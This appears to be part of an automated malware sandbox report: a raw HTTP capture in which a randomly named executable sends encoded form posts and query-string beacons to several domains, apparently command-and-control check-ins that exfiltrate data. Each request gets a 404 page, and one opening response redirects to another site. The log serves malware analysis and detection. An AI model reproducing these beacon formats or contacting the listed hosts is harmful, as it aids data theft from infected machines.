                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Vary: Accept-Encoding
                                      Data Ascii: 1ed<html><head> <meta charset="utf-8"><meta http-equiv="refresh" content="0.1; url=https://zijrmf.com/register" /> <script type="text/javascript" src="https://js.users.51.la/21876343.js"></script><script>var _hmt = _hmt || [];(function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?656519d7bd35a3f2337e0cc6c7d88db2"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s);})();</script></body></html>0


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      25 | 192.168.2.5 | 51391 | 101.36.121.143 | 80 | 2608 | C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 10, 2024 10:22:28.451299906 CEST | 717 | OUT | POST /5965/ HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.shrongcen.com
                                      Content-Length: 208
                                      Cache-Control: no-cache
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Origin: http://www.shrongcen.com
                                      Referer: http://www.shrongcen.com/5965/
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Data Ascii: TTv82Lg=wh44AEn0JVqMN0XftorcUoI6nnvwrpGpKx3wbpLY5JKSbPgQLOfpCDu18b3z8Gp3yZhDhgbwZ4Rv5JvjXYhIatZPVj9O5t4pEbbO2mHVLXJpZpZJinoHkiWiBA12EIjnXs68v5Y8oua1ltdKVagBLVi010DGUnIKmME92YQjhNH0zNG3ozpalNSHUw8ZuWRo0TBAN/k=
                                      Jun 10, 2024 10:22:29.399543047 CEST | 318 | IN | HTTP/1.1 404 Not Found
                                      Server: nginx/1.20.1
                                      Date: Mon, 10 Jun 2024 08:22:29 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Content-Length: 153
                                      Connection: close
                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.20.1</center></body></html>


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      26 | 192.168.2.5 | 51392 | 101.36.121.143 | 80 | 2608 | C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 10, 2024 10:22:30.992815971 CEST | 737 | OUT | POST /5965/ HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.shrongcen.com
                                      Content-Length: 228
                                      Cache-Control: no-cache
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Origin: http://www.shrongcen.com
                                      Referer: http://www.shrongcen.com/5965/
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Data Ascii: TTv82Lg=wh44AEn0JVqMPVnfirDcF4I7oHvw9ZGlKxzwboPI+7eScrkQKPfpBDu1kL234GpGyZtxhhnwZ4Fv5NnjXv1Hb9ZNBT9M9t4pEbbO2mSOLXRpZ6BJjD8EqCWhWw12AIjjXs7bv4EGosy1lstKULgCSFi2okCTQHtG/MUB1rJ+0vXu7brdyRhy2t+/Ej0u/mwBuwRwToze43H1pZzaAsoiVvJHaw06
                                      Jun 10, 2024 10:22:31.972712994 CEST | 318 | IN | HTTP/1.1 404 Not Found
                                      Server: nginx/1.20.1
                                      Date: Mon, 10 Jun 2024 08:22:31 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Content-Length: 153
                                      Connection: close
                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.20.1</center></body></html>


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      27 | 192.168.2.5 | 51393 | 101.36.121.143 | 80 | 2608 | C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 10, 2024 10:22:33.525440931 CEST | 1754 | OUT | POST /5965/ HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.shrongcen.com
                                      Content-Length: 1244
                                      Cache-Control: no-cache
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Origin: http://www.shrongcen.com
                                      Referer: http://www.shrongcen.com/5965/
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Data Ascii: TTv82Lg= [TRUNCATED]
                                      Jun 10, 2024 10:22:34.494849920 CEST | 318 | IN | HTTP/1.1 404 Not Found
                                      Server: nginx/1.20.1
                                      Date: Mon, 10 Jun 2024 08:22:34 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Content-Length: 153
                                      Connection: close
                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.20.1</center></body></html>


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      28 | 192.168.2.5 | 51394 | 101.36.121.143 | 80 | 2608 | C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 10, 2024 10:22:36.059393883 CEST | 456 | OUT | GET /5965/?TTv82Lg=9jQYDwKIZi6/W0GvqqOWctdn1nDe86qQU37QFI3e35aKJbsuGODGFib0m7CCxXxx0blg9Tj0Vv9f5L3iX8JxT+4MBVsytoUBFOmu7GzeNBgPNO5fqFAxhyq0WiRZHbK4BA==&kH=00U8ENLHk HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.shrongcen.com
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Jun 10, 2024 10:22:37.554281950 CEST | 318 | IN | HTTP/1.1 404 Not Found
                                      Server: nginx/1.20.1
                                      Date: Mon, 10 Jun 2024 08:22:36 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Content-Length: 153
                                      Connection: close
                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.20.1</center></body></html>


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      29 | 192.168.2.5 | 51395 | 103.138.88.32 | 80 | 2608 | C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 10, 2024 10:22:43.665865898 CEST | 720 | OUT | POST /gwqo/ HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.skyinftech.com
                                      Content-Length: 208
                                      Cache-Control: no-cache
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Origin: http://www.skyinftech.com
                                      Referer: http://www.skyinftech.com/gwqo/
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Data Ascii: TTv82Lg=lmv9tf1jCXQGl+VrSWpZelW2bSkWunuvHc4hVlS7crYbpXOa+vdWtMzgSw0FTqkwiJG31/lAFbfM/FWyTvxUhjSAd2P4sG7jRMSvI/uF0+rUWtdIqDTnph+0Xsm4XMeT4xIPo711kBhA5yQkATAb85l6A+Q17ISIZseN1fFi8NLe52L1WDSPumkcVUREW/xIje1nKOY=
                                      Jun 10, 2024 10:22:44.669698000 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                      Connection: close
                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                      pragma: no-cache
                                      content-type: text/html
                                      content-length: 1238
                                      date: Mon, 10 Jun 2024 08:22:42 GMT
                                      server: LiteSpeed
                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;"
                                      Jun 10, 2024 10:22:44.669744968 CEST | 240 | IN
                                      Data Ascii: href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      30 | 192.168.2.5 | 51396 | 103.138.88.32 | 80 | 2608 | C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 10, 2024 10:22:46.195141077 CEST | 740 | OUT | POST /gwqo/ HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.skyinftech.com
                                      Content-Length: 228
                                      Cache-Control: no-cache
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Origin: http://www.skyinftech.com
                                      Referer: http://www.skyinftech.com/gwqo/
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Data Ascii: TTv82Lg=lmv9tf1jCXQGjelrQ1RZVlWxFCkWkHvmHcEhVkGrcY8bo3+a/t1WgszgAQ0AXqk7iJCZ1/ZAFbLM/EmyTcpbuTS4VWP6oG7jRMSvI/q80+zUVdtIriTknB+zdMm4AceX4xI9o6ZTkHtA52UkRh4Y15l8fuR43t32AaKx5egzjd7f8AmfMhan9GIkFHZzHPQh59lXUZNGDLwHf4IgzbHvl9xYUiLI
                                      Jun 10, 2024 10:22:47.210644007 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                      Connection: close
                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                      pragma: no-cache
                                      content-type: text/html
                                      content-length: 1238
                                      date: Mon, 10 Jun 2024 08:22:45 GMT
                                      server: LiteSpeed
                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;"
                                      Jun 10, 2024 10:22:47.210664034 CEST | 240 | IN
                                      Data Ascii: href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      31 | 192.168.2.5 | 51397 | 103.138.88.32 | 80 | 2608 | C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 10, 2024 10:22:48.726429939 CEST | 1757 | OUT | POST /gwqo/ HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.skyinftech.com
                                      Content-Length: 1244
                                      Cache-Control: no-cache
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Origin: http://www.skyinftech.com
                                      Referer: http://www.skyinftech.com/gwqo/
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Data Ascii: TTv82Lg= [TRUNCATED]
                                      Jun 10, 2024 10:22:49.729759932 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                      Connection: close
                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                      pragma: no-cache
                                      content-type: text/html
                                      content-length: 1238
                                      date: Mon, 10 Jun 2024 08:22:47 GMT
                                      server: LiteSpeed
                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;"
                                      Jun 10, 2024 10:22:49.729780912 CEST | 240 | IN
                                      Data Ascii: href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      32 | 192.168.2.5 | 51398 | 103.138.88.32 | 80 | 2608 | C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 10, 2024 10:22:51.257191896 CEST | 457 | OUT | GET /gwqo/?kH=00U8ENLHk&TTv82Lg=okHduu9bAgMM6c4GdEVgS1G+EVcXjBymZ/AEM3aFVKlZzziUwfhKvtqGWgkRboMd4eWK0/sAAMCd+0rGXOBNsjDOL2SA50vrXr2QK+Wy7YL6dLNwijbZiWqDBeKnevfe7g== HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.skyinftech.com
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Jun 10, 2024 10:22:52.257174015 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                      Connection: close
                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                      pragma: no-cache
                                      content-type: text/html
                                      content-length: 1238
                                      date: Mon, 10 Jun 2024 08:22:50 GMT
                                      server: LiteSpeed
                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;"
                                      Jun 10, 2024 10:22:52.257200956 CEST | 240 | IN
                                      Data Ascii: href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      33 | 192.168.2.5 | 51399 | 162.0.213.72 | 80 | 2608 | C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 10, 2024 10:22:57.906155109 CEST | 711 | OUT | POST /fv92/ HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.chowzen.top
                                      Content-Length: 208
                                      Cache-Control: no-cache
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Origin: http://www.chowzen.top
                                      Referer: http://www.chowzen.top/fv92/
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Data Ascii: TTv82Lg=/KTOcIRx358S2U0ZrHD0tWk26+y6gz7TojVU0XLg69QdgjMoxkqIT82OxMfmKPN4i89olZtqrOnQkg0TYYy1s1z52+ZHTECtj3aBdXJa1+422Th6cJaw0E2EkMQ4iC+sFzGOWOpBnE7JOiZWiqu2lLBUjgBEOhGoJIX/AjfpRjeyABIX7JFhMpMREo3B+o1xqKsrBFQ=
                                      Jun 10, 2024 10:22:58.575686932 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                      Date: Mon, 10 Jun 2024 08:22:58 GMT
                                      Server: Apache
                                      Content-Length: 16026
                                      Connection: close
                                      Content-Type: text/html
                                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      34 | 192.168.2.5 | 51400 | 162.0.213.72 | 80 | 2608 | C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 10, 2024 10:23:00.446290016 CEST | 731 | OUT | POST /fv92/ HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.chowzen.top
                                      Content-Length: 228
                                      Cache-Control: no-cache
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Origin: http://www.chowzen.top
                                      Referer: http://www.chowzen.top/fv92/
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Data Ascii: TTv82Lg=/KTOcIRx358S21kZ4RL08Gk11ey6rT7IojpU0W/K6P0dgDcowhWIdc2O+setU/Nzi8BKlZRqrPDQki8TYve6tlz7tuZBMUCtj3aBdXcP16U22jx6TLi3vk2HjMQ4zS+wFzGwWP1vnC/JOjpWh4G3uLARngAEHyjMHqjfBhmrPiaIB3l9hrNJfJgpU7/2vYUYwp8bfSHQ6IeLYGc0Eg0F57uQELv+
                                      Jun 10, 2024 10:23:01.125991106 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                      Date: Mon, 10 Jun 2024 08:23:01 GMT
                                      Server: Apache
                                      Content-Length: 16026
                                      Connection: close
                                      Content-Type: text/html
                                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      35 | 192.168.2.5 | 51401 | 162.0.213.72 | 80 | 2608 | C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 10, 2024 10:23:03.082406044 CEST | 1748 | OUT | POST /fv92/ HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.chowzen.top
                                      Content-Length: 1244
                                      Cache-Control: no-cache
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Origin: http://www.chowzen.top
                                      Referer: http://www.chowzen.top/fv92/
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Data Ascii: TTv82Lg=/KTOcIRx358S21kZ4RL08Gk11ey6rT7IojpU0W/K6P8dgQkoxC+Iec2OzMeuU/NUi8pOlZdcrMrQlBkTJrK601z7y+ZATECCj3KNdXMP16U22ld6XZa3oU2EkMQ8iC+MF3jLWPhRyifJNARWy9y3srATggAqHyfTHuD1BluVPlWIBQhr+ZdvA5lKbq7Fz8507aUMUBTy+cDhQm4rQjx6j8nCG9ChNBBNetk5JQKKbE5wPKErv40HVToU5+FkSav18++NtMOEDqgGWPXhgDk0yKLWP4ttVPy2EAiTEIiIPHUM1i+ZFDsEfF7eeghXQEL92k9UzeY2MxWfqw12qcCNgCnmy7UIlOamAKVPTBwx0c0dNWcldzT1vy7CAuPOQzCX1oel2qWaF2hk9ggEhqPuiGtcB7TjgMiSCBH6vjMIfq5TWeBYll+fXETVb7tnhb2vUh3+qBHq1m2g8m/Xx/YsePD6zlzIVdw9fB3OKWHkLeWmsYVmTjForOUUFQHvGHwtazuIwi+w7UlpsPe2RXXmPligJXvP8eQ6B6xhKJgRHyvC2zpwujy62nlGXPu782XDJ2vVRnfLgQaX5tcRCC85py8kPIiInNWE1j0jfIg2GnJMfYYFuJXibNbe8AyFCCmc8O7vJHmTPGAW7kb/l2eCr6htfpfm5i3sF7PJnFqgov51Om5f0XA0HbaS+lLo8QBmSAstc5Y3C2VMvRDOaMqb2lucbSSwXbAwUuDXsaAwuHPx93DQYKAuPT0+lLdh3tMzZx+7wHlYsskaFdEwristjBpGdt/aBtzwmbWdQKbIBcYyfp6LVyUfLjJ3+55IseNg3QWPrqaqodUN2UcotozwUsOjuHL/P0KoE9TwFdPu0Cemz4icy5Xtts6nR/bCrDBCdw85CqCE9VFEIQgvhJ0NNqBPuOZIBSOfuzMGf7vQSUiW2r42nfDH82VG4WrEx4zQsXk03RqM3vMyxE6OkoBA7V5x7BEq9AYrRyHbd4Afe0Px [TRUNCATED]
                                      Jun 10, 2024 10:23:03.746912956 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                      Date: Mon, 10 Jun 2024 08:23:03 GMT
                                      Server: Apache
                                      Content-Length: 16026
                                      Connection: close
                                      Content-Type: text/html
                                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]
                                      Jun 10, 2024 10:23:03.746958971 CEST212INData Raw: 73 2d 32 38 2e 34 38 35 2d 31 36 2e 35 39 39 2d 33 34 2e 38 37 37 2d 32 34 2e 31 39 32 63 2d 33 2e 31 30 31 2d 33 2e 36 38 34 2d 34 2e 31 37 37 2d 38 2e 36 36 2d 32 2e 39 33 2d 31 33 2e 33 31 31 6c 37 2e 34 35 33 2d 32 37 2e 37 39 38 63 30 2e 37
                                      Data Ascii: s-28.485-16.599-34.877-24.192c-3.101-3.684-4.177-8.66-2.93-13.311l7.453-27.798c0.756-2.82,3.181-4.868,6.088-5.13 c6.755-0.61,20.546-0.608,41.785,5.087s33.181,12.591,38.725,16.498c2.387,1.682,3.461
                                      Jun 10, 2024 10:23:03.747015953 CEST1236INData Raw: 2c 34 2e 36 36 38 2c 32 2e 37 30 35 2c 37 2e 34 38 38 4c 33 38 30 2e 38 35 37 2c 33 34 36 2e 31 36 34 7a 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 63 6c 69 70 50 61 74 68 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63
                                      Data Ascii: ,4.668,2.705,7.488L380.857,346.164z" /> </clipPath> <clipPath id="cordClip"> <rect width="800" height="600" /> </clipPath> </defs> <g id="planet">
                                      Jun 10, 2024 10:23:03.747051001 CEST1236INData Raw: 2e 30 36 39 2c 30 2c 36 38 2e 39 37 38 2d 31 2e 31 39 2c 39 33 2e 39 32 32 2d 33 2e 31 34 39 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 73 74 61 72 73 22 3e 0a 20 20
                                      Data Ascii: .069,0,68.978-1.19,93.922-3.149" /> </g> <g id="stars"> <g id="starsBig"> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit
